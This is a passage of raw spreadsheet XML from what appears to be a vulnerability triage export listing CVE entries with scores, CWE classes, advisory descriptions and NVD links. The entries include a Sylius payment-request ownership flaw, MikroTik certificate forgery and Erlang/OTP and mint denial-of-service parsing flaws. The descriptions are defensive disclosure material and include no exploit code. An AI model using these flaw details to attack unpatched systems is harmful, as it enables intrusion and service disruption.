/><c r="K1742" s="5" t="inlineStr" /><c r="L1742" s="5" t="inlineStr" /><c r="M1742" s="5" t="inlineStr" /><c r="N1742" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1742" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1742" s="5" t="inlineStr" /><c r="Q1742" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1742" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Starting in version 2.0.0 and prior to version 2.0.18, 2.1.15, and 2.2.6, the `GET /api/v2/shop/payment-requests/{hash}` and `PUT /api/v2/shop/payment-requests/{hash}` endpoints look up the payment request solely by the hash from the URL. No ownership check is performed against the authenticated customer or the underlying order. An attacker who obtains a payment request hash can read the payment request and, through the `payment` IRI in the response, recover the underlying order's `tokenValue` (which itself grants access to the full order, items, addresses, customer email, totals); and/or update the payment request payload (e.g. `target_path`, `after_path`). These fields are used by the front-end controller to redirect the user after the payment, so an attacker can flip them to an attacker-controlled URL and intercept the buyer. The hash is a UUID, so it has to be obtained out-of-band (logs, shared links, referrer headers, a co-located client), but once it is known no other credential is required, neither authentication nor knowledge of the order token. The creation endpoint `POST /api/v2/shop/orders/{tokenValue}/payment-requests` shares the same flaw: it resolves the target order solely from the `tokenValue` in the URL without verifying that the caller owns the order. The issue is fixed in versions 2.0.18, 2.1.15, and 2.2.6. As a workaround, add a query extension that filters the `GET` operation; decorate the `PUT` state provider, guard the `POST` creation endpoint with a command-bus middleware, and wire the services.</t></is></c><c r="S1742" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53639</t></is></c></row><row r="1743"><c r="A1743" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1743" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1743" s="5" t="inlineStr"><is><t>CVE-2026-6217</t></is></c><c r="D1743" s="5" t="n"><v>6.3</v></c><c r="E1743" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1743" s="5" t="inlineStr"><is><t>iletisim@usom.gov.tr</t></is></c><c r="G1743" s="5" t="inlineStr" /><c r="H1743" s="5" t="n"><v>0.001</v></c><c r="I1743" s="5" t="inlineStr" /><c r="J1743" s="5" t="inlineStr" /><c r="K1743" s="5" t="inlineStr" /><c r="L1743" s="5" t="inlineStr" /><c r="M1743" s="5" t="inlineStr" /><c r="N1743" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1743" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1743" s="5" t="inlineStr" /><c r="Q1743" s="5" t="inlineStr"><is><t>CWE-759</t></is></c><c r="R1743" s="5" t="inlineStr"><is><t>Use of a One-Way hash without a salt vulnerability in Pik Online Software Solutions Inc. Pik Online Portal allows Cryptanalysis.

This issue affects Pik Online Portal: through 3.5.1.</t></is></c><c r="S1743" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-6217</t></is></c></row><row r="1744"><c r="A1744" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1744" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1744" s="5" t="inlineStr"><is><t>CVE-2026-67278</t></is></c><c r="D1744" s="5" t="n"><v>6.3</v></c><c r="E1744" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1744" s="5" t="inlineStr"><is><t>cvd@cert.pl</t></is></c><c r="G1744" s="5" t="inlineStr" /><c r="H1744" s="5" t="n"><v>0.002</v></c><c r="I1744" s="5" t="inlineStr" /><c r="J1744" s="5" t="inlineStr" /><c r="K1744" s="5" t="inlineStr" /><c r="L1744" s="5" t="inlineStr" /><c r="M1744" s="5" t="inlineStr" /><c r="N1744" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1744" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1744" s="5" t="inlineStr" /><c r="Q1744" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R1744" s="5" t="inlineStr"><is><t>MikroTik RouterOS accepts malformed RSA/PKCS#1 v1.5 signatures during X.509 validation. Because its trust store includes an e=3 root CA, an attacker controlling or redirecting an outbound RouterOS TLS connection can use the root’s public certificate - without its private key - to forge a trusted intermediate and issue certificates for arbitrary hostnames, enabling TLS server impersonation.

This issue affects only 7.x branch was fixed in versions: 7.23.4 (Long-term) and 7.24.2 (Stable)</t></is></c><c r="S1744" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67278</t></is></c></row><row r="1745"><c r="A1745" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1745" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1745" s="5" t="inlineStr"><is><t>CVE-2026-70405</t></is></c><c r="D1745" s="5" t="n"><v>6.3</v></c><c r="E1745" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1745" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1745" s="5" t="inlineStr" /><c r="H1745" s="5" t="n"><v>0.004</v></c><c r="I1745" s="5" t="inlineStr" /><c r="J1745" s="5" t="inlineStr" /><c r="K1745" s="5" t="inlineStr" /><c r="L1745" s="5" t="inlineStr" /><c r="M1745" s="5" t="inlineStr" /><c r="N1745" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1745" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1745" s="5" t="inlineStr" /><c r="Q1745" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="R1745" s="5" t="inlineStr"><is><t>Improper Validation of Specified Quantity in Input vulnerability in Erlang/OTP snmp allows a remote attacker to degrade availability by sending an SNMP message containing a BER INTEGER whose length field is arbitrarily large.

snmp_pdus:dec_integer_notag/1 defaults its size limit to infinity, and do_dec_integer_notag/2 then accumulates the value across every declared byte with a recursive shift and bitwise or. Work grows superlinearly in the declared length because each operation acts on a progressively larger bignum. The size-limited variant dec_integer_notag/2 exists but is reached from only one call site, dec_snmp_version/1, which bounds the version field to ten bytes; the request identifier, error status and index, generic and specific trap fields, engine boots and time, and every varbind value decoded by dec_value/1 all use the unbounded form. The decode runs before the PDU is processed, so no valid request is required beyond what the deployment demands to accept the message at all.

This issue affects OTP from OTP 17.0 before OTP 27.3.4.17, from OTP 28.0 before OTP 28.5.0.6, and from OTP 29.0 before OTP 29.0.6, corresponding to snmp from 4.25.1 before 5.18.2.1, from 5.19 before 5.20.2.2, and from 5.20.3 before 5.20.5. Whether OTP before OTP 17.0, corresponding to snmp before 4.25.1, is affected is unknown.</t></is></c><c r="S1745" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70405</t></is></c></row><row r="1746"><c r="A1746" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1746" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1746" s="5" t="inlineStr"><is><t>CVE-2026-70409</t></is></c><c r="D1746" s="5" t="n"><v>6.3</v></c><c r="E1746" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1746" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1746" s="5" t="inlineStr" /><c r="H1746" s="5" t="n"><v>0.004</v></c><c r="I1746" s="5" t="inlineStr" /><c r="J1746" s="5" t="inlineStr" /><c r="K1746" s="5" t="inlineStr" /><c r="L1746" s="5" t="inlineStr" /><c r="M1746" s="5" t="inlineStr" /><c r="N1746" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1746" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1746" s="5" t="inlineStr" /><c r="Q1746" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="R1746" s="5" t="inlineStr"><is><t>Improper Validation of Specified Quantity in Input vulnerability in Erlang/OTP eldap allows a malicious or compromised LDAP server to degrade availability by returning a referral URL whose port component is a very long run of digits.

eldap:parse_port/2 passes the port substring straight to list_to_integer/1 with no length bound. The surrounding try ... catch only rejects a value that fails to parse, so a syntactically valid port of up to roughly 1.26 million digits converts successfully and costs the caller hundreds of milliseconds of arbitrary-precision arithmetic per referral. The conversion function itself is documented to accept integers of any size, so bounding the input is the caller's responsibility. Reaching the flaw requires the application to pass a server-supplied referral to eldap:parse_ldap_url/1, which eldap never calls itself: referral strings are returned to the caller unparsed.

This issue affects OTP from OTP 17.0 before OTP 27.3.4.17, from OTP 28.0 before OTP 28.5.0.6, and from OTP 29.0 before OTP 29.0.6, corresponding to eldap from 1.0.3 before 1.2.14.2, from 1.2.15 before 1.2.16.1, and from 1.3 before 1.3.1.</t></is></c><c r="S1746" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70409</t></is></c></row><row r="1747"><c r="A1747" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1747" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1747" s="5" t="inlineStr"><is><t>CVE-2026-71562</t></is></c><c r="D1747" s="5" t="n"><v>6.3</v></c><c r="E1747" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1747" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1747" s="5" t="inlineStr" /><c r="H1747" s="5" t="n"><v>0.003</v></c><c r="I1747" s="5" t="inlineStr" /><c r="J1747" s="5" t="inlineStr" /><c r="K1747" s="5" t="inlineStr" /><c r="L1747" s="5" t="inlineStr" /><c r="M1747" s="5" t="inlineStr" /><c r="N1747" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1747" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1747" s="5" t="inlineStr" /><c r="Q1747" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="R1747" s="5" t="inlineStr"><is><t>Improper Validation of Specified Quantity in Input vulnerability in Erlang/OTP inets httpc allows a malicious or compromised HTTP server to degrade availability by returning a numeric header whose value is a very long run of digits.

httpc_handler.erl converts the server-supplied Content-Length with list_to_integer/1 before comparing it against max_body_size, so the size check cannot protect the conversion, and the option defaults to nolimit in any case. The same unbounded conversion appears in httpc_response:format_response/1 for Content-Length and in httpc_response:get_ms_from_retry_after/1 for Retry-After, which is guarded only by a check that the first character is a digit. A value of up to roughly 1.26 million digits converts successfully and costs the requesting process hundreds of milliseconds of arbitrary-precision arithmetic per response. The conversion function is documented to accept integers of any size, so bounding the input is the caller's responsibility.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1747" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71562</t></is></c></row><row r="1748"><c r="A1748" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1748" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1748" s="5" t="inlineStr"><is><t>CVE-2026-75168</t></is></c><c r="D1748" s="5" t="n"><v>6.3</v></c><c r="E1748" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1748" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1748" s="5" t="inlineStr" /><c r="H1748" s="5" t="n"><v>0.003</v></c><c r="I1748" s="5" t="inlineStr" /><c r="J1748" s="5" t="inlineStr" /><c r="K1748" s="5" t="inlineStr" /><c r="L1748" s="5" t="inlineStr" /><c r="M1748" s="5" t="inlineStr" /><c r="N1748" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1748" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1748" s="5" t="inlineStr" /><c r="Q1748" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R1748" s="5" t="inlineStr"><is><t>An issue in the ugw-editfile method of /cgi-bin/wwwugw.cgi in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with the low-privileged Standard role to write arbitrary content to files within /uxx/config/ and /ugw/config/.</t></is></c><c r="S1748" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75168</t></is></c></row><row r="1749"><c r="A1749" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1749" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1749" s="5" t="inlineStr"><is><t>CVE-2026-81725</t></is></c><c r="D1749" s="5" t="n"><v>6.3</v></c><c r="E1749" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1749" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1749" s="5" t="inlineStr" /><c r="H1749" s="5" t="n"><v>0.002</v></c><c r="I1749" s="5" t="inlineStr" /><c r="J1749" s="5" t="inlineStr" /><c r="K1749" s="5" t="inlineStr" /><c r="L1749" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M1749" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1749" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O1749" s="5" t="inlineStr" /><c r="P1749" s="5" t="inlineStr" /><c r="Q1749" s="5" t="inlineStr"><is><t>CWE-400, CWE-1333</t></is></c><c r="R1749"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S1749" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81725</t></is></c></row><row r="1750"><c r="A1750" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1750" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1750" s="5" t="inlineStr"><is><t>CVE-2026-81824</t></is></c><c r="D1750" s="5" t="n"><v>6.3</v></c><c r="E1750" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1750" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G1750" s="5" t="inlineStr" /><c r="H1750" s="5" t="n"><v>0.002</v></c><c r="I1750" s="5" t="inlineStr" /><c r="J1750" s="5" t="inlineStr" /><c r="K1750" s="5" t="inlineStr" /><c r="L1750" s="5" t="inlineStr" /><c r="M1750" s="5" t="inlineStr" /><c r="N1750" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1750" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1750" s="5" t="inlineStr" /><c r="Q1750" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1750" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant to run arbitrary JavaScript code in a browser session of a PIMBoards user who was socially engineered to click on a malicious link.</t></is></c><c r="S1750" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81824</t></is></c></row><row r="1751"><c r="A1751" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1751" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1751" s="5" t="inlineStr"><is><t>CVE-2026-81904</t></is></c><c r="D1751" s="5" t="n"><v>6.3</v></c><c r="E1751" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1751" s="5" t="inlineStr"><is><t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t></is></c><c r="G1751" s="5" t="inlineStr" /><c r="H1751" s="5" t="n"><v>0.003</v></c><c r="I1751" s="5" t="inlineStr" /><c r="J1751" s="5" t="inlineStr" /><c r="K1751" s="5" t="inlineStr" /><c r="L1751" s="5" t="inlineStr" /><c r="M1751" s="5" t="inlineStr" /><c r="N1751" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1751" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1751" s="5" t="inlineStr" /><c r="Q1751" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1751" s="5" t="inlineStr"><is><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is></c><c r="S1751" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81904</t></is></c></row><row r="1752"><c r="A1752" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1752" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1752" s="5" t="inlineStr"><is><t>CVE-2026-81994</t></is></c><c r="D1752" s="5" t="n"><v>6.3</v></c><c r="E1752" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1752" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1752" s="5" t="inlineStr" /><c r="H1752" s="5" t="n"><v>0.003</v></c><c r="I1752" s="5" t="inlineStr" /><c r="J1752" s="5" t="inlineStr" /><c r="K1752" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1752" s="5" t="inlineStr" /><c r="M1752" s="5" t="inlineStr" /><c r="N1752" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1752" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1752" s="5" t="inlineStr" /><c r="Q1752" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="R1752" s="5" t="inlineStr"><is><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is></c><c r="S1752" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81994</t></is></c></row><row r="1753"><c r="A1753" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1753" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1753" s="5" t="inlineStr"><is><t>CVE-2026-81997</t></is></c><c r="D1753" s="5" t="n"><v>6.3</v></c><c r="E1753" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1753" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1753" s="5" t="inlineStr" /><c r="H1753" s="5" t="n"><v>0.002</v></c><c r="I1753" s="5" t="inlineStr" /><c r="J1753" s="5" t="inlineStr" /><c r="K1753" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1753" s="5" t="inlineStr" /><c r="M1753" s="5" t="inlineStr" /><c r="N1753" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1753" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1753" s="5" t="inlineStr" /><c r="Q1753" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1753" s="5" t="inlineStr"><is><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is></c><c r="S1753" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81997</t></is></c></row><row r="1754"><c r="A1754" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1754" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1754" s="5" t="inlineStr"><is><t>CVE-2026-82729</t></is></c><c r="D1754" s="5" t="n"><v>6.3</v></c><c r="E1754" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1754" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1754" s="5" t="inlineStr" /><c r="H1754" s="5" t="n"><v>0.005</v></c><c r="I1754" s="5" t="inlineStr" /><c r="J1754" s="5" t="inlineStr" /><c r="K1754" s="5" t="inlineStr" /><c r="L1754" s="5" t="inlineStr" /><c r="M1754" s="5" t="inlineStr" /><c r="N1754" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1754" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1754" s="5" t="inlineStr" /><c r="Q1754" s="5" t="inlineStr"><is><t>CWE-407</t></is></c><c r="R1754" s="5" t="inlineStr"><is><t>Inefficient Algorithmic Complexity vulnerability in elixir-mint mint allows a remote HTTP server to exhaust CPU on the client host and cause a denial of service.

parse_hex_prefix/2 in lib/mint/http1/parse.ex folds each hex digit of a chunked response's chunk-size field into an arbitrary-precision accumulator with acc * 16 + digit and imposes no limit on the digit count. Because the accumulator grows without bound, the multiplication is not constant time and one pass over N digits costs O(N squared). handle_data/2 prepends conn.buffer and re-parses from the start on every socket message, so a server that dribbles the digits out in small packets makes the client pay that cost repeatedly. A run of roughly 512,000 hex digits costs over ten seconds of CPU in a single pass, measured on stock defaults. The parser reaches this state after a valid status line and a complete, valid header section, so an intermediary inspecting only headers sees an ordinary 200 response.

This issue affects mint: from 1.9.3 before 1.10.0.</t></is></c><c r="S1754" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82729</t></is></c></row><row r="1755"><c r="A1755" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1755" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1755" s="5" t="inlineStr"><is><t>CVE-2026-83610</t></is></c><c r="D1755" s="5" t="n"><v>6.3</v></c><c r="E1755" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1755" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1755" s="5" t="inlineStr" /><c r="H1755" s="5" t="n"><v>0.004</v></c><c r="I1755" s="5" t="inlineStr" /><c r="J1755" s="5" t="inlineStr" /><c r="K1755" s="5" t="inlineStr" /><c r="L1755" s="5" t="inlineStr" /><c r="M1755" s="5" t="inlineStr" /><c r="N1755" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1755" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1755" s="5" t="inlineStr" /><c r="Q1755" s="5" t="inlineStr"><is><t>CWE-116</t></is></c><c r="R1755" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, Document.createEntityReference(name) accepts an invalid name and the ENTITY_REFERENCE_NODE serializer emits the resulting nodeName directly in &amp;name; form. Directly serializing the node or fragment with XMLSerializer.serializeToString() and requireWellFormed: true can therefore break the entity-reference boundary and produce attacker-controlled XML markup when reparsed. The parser does not ordinarily create these nodes, and element-child insertion is rejected, so exploitation requires an application to create and directly serialize an EntityReference. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t></is></c><c r="S1755" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83610</t></is></c></row><row r="1756"><c r="A1756" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1756" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1756" s="5" t="inlineStr"><is><t>CVE-2026-84303</t></is></c><c r="D1756" s="5" t="n"><v>6.3</v></c><c r="E1756" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1756" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1756" s="5" t="inlineStr" /><c r="H1756" s="5" t="n"><v>0.003</v></c><c r="I1756" s="5" t="inlineStr" /><c r="J1756" s="5" t="inlineStr" /><c r="K1756" s="5" t="inlineStr" /><c r="L1756" s="5" t="inlineStr"><is><t>go:google.golang.org/grpc</t></is></c><c r="M1756" s="5" t="inlineStr"><is><t>1.83.1</t></is></c><c r="N1756" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O1756" s="5" t="inlineStr" /><c r="P1756" s="5" t="inlineStr" /><c r="Q1756" s="5" t="inlineStr"><is><t>CWE-178, CWE-863</t></is></c><c r="R1756"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S1756" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84303</t></is></c></row><row r="1757"><c r="A1757" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1757" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1757" s="5" t="inlineStr"><is><t>CVE-2026-84376</t></is></c><c r="D1757" s="5" t="n"><v>6.3</v></c><c r="E1757" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1757" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1757" s="5" t="inlineStr" /><c r="H1757" s="5" t="n"><v>0.004</v></c><c r="I1757" s="5" t="inlineStr" /><c r="J1757" s="5" t="inlineStr" /><c r="K1757" s="5" t="inlineStr" /><c r="L1757" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M1757" s="5" t="inlineStr"><is><t>7.2.4</t></is></c><c r="N1757" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O1757" s="5" t="inlineStr" /><c r="P1757" s="5" t="inlineStr" /><c r="Q1757" s="5" t="inlineStr"><is><t>CWE-187</t></is></c><c r="R1757"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S1757" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84376</t></is></c></row><row r="1758"><c r="A1758" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1758" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1758" s="5" t="inlineStr"><is><t>CVE-2026-84942</t></is></c><c r="D1758" s="5" t="n"><v>6.3</v></c><c r="E1758" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1758" s="5" t="inlineStr"><is><t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t></is></c><c r="G1758" s="5" t="inlineStr" /><c r="H1758" s="5" t="n"><v>0.003</v></c><c r="I1758" s="5" t="inlineStr" /><c r="J1758" s="5" t="inlineStr" /><c r="K1758" s="5" t="inlineStr" /><c r="L1758" s="5" t="inlineStr" /><c r="M1758" s="5" t="inlineStr" /><c r="N1758" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1758" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1758" s="5" t="inlineStr" /><c r="Q1758" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1758" s="5" t="inlineStr"><is><t>Improper input validation in the Vega expression function implementation in OpenSearch Dashboards allows a remote authenticated actor with dashboard write permissions to execute arbitrary JavaScript in the context of other users' browser sessions by saving a crafted Vega visualization. The checkForFunctionProperty validation routine failed to recurse into arrays of objects, allowing a function property nested inside an array to bypass validation.</t></is></c><c r="S1758" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84942</t></is></c></row><row r="1759"><c r="A1759" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1759" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1759" s="5" t="inlineStr"><is><t>CVE-2026-85084</t></is></c><c r="D1759" s="5" t="n"><v>6.3</v></c><c r="E1759" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1759" s="5" t="inlineStr"><is><t>PSIRT@samsung.com</t></is></c><c r="G1759" s="5" t="inlineStr" /><c r="H1759" s="5" t="n"><v>0.001</v></c><c r="I1759" s="5" t="inlineStr" /><c r="J1759" s="5" t="inlineStr" /><c r="K1759" s="5" t="inlineStr" /><c r="L1759" s="5" t="inlineStr" /><c r="M1759" s="5" t="inlineStr" /><c r="N1759" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1759" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1759" s="5" t="inlineStr" /><c r="Q1759" s="5" t="inlineStr"><is><t>CWE-129, CWE-787</t></is></c><c r="R1759" s="5" t="inlineStr"><is><t>Out-of-bounds Write and Improper Validation of Array Index vulnerability in Samsung Open Source TizenFX Samsung/TizenFX allows Overflow Buffers.</t></is></c><c r="S1759" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85084</t></is></c></row><row r="1760"><c r="A1760" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1760" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1760" s="5" t="inlineStr"><is><t>CVE-2026-85592</t></is></c><c r="D1760" s="5" t="n"><v>6.3</v></c><c r="E1760" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1760" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1760" s="5" t="inlineStr" /><c r="H1760" s="5" t="n"><v>0.002</v></c><c r="I1760" s="5" t="inlineStr" /><c r="J1760" s="5" t="inlineStr" /><c r="K1760" s="5" t="inlineStr" /><c r="L1760" s="5" t="inlineStr" /><c r="M1760" s="5" t="inlineStr" /><c r="N1760" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1760" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1760" s="5" t="inlineStr" /><c r="Q1760" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1760" s="5" t="inlineStr"><is><t>phpMyFAQ before 4.1.8 contains an authorization bypass vulnerability in the question creation endpoint where the isAddingQuestionsAllowed() method grants access to all callers when main.enableAskQuestions is enabled, ignoring the records.allowQuestionsForGuests setting. Unauthenticated attackers can submit questions via the question/create API endpoint to bypass guest submission restrictions and inject spam into the admin moderation queue.</t></is></c><c r="S1760" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85592</t></is></c></row><row r="1761"><c r="A1761" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1761" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1761" s="5" t="inlineStr"><is><t>CVE-2026-86186</t></is></c><c r="D1761" s="5" t="n"><v>6.3</v></c><c r="E1761" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1761" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1761" s="5" t="inlineStr" /><c r="H1761" s="5" t="n"><v>0.002</v></c><c r="I1761" s="5" t="inlineStr" /><c r="J1761" s="5" t="inlineStr" /><c r="K1761" s="5" t="inlineStr" /><c r="L1761" s="5" t="inlineStr" /><c r="M1761" s="5" t="inlineStr" /><c r="N1761" s="5" 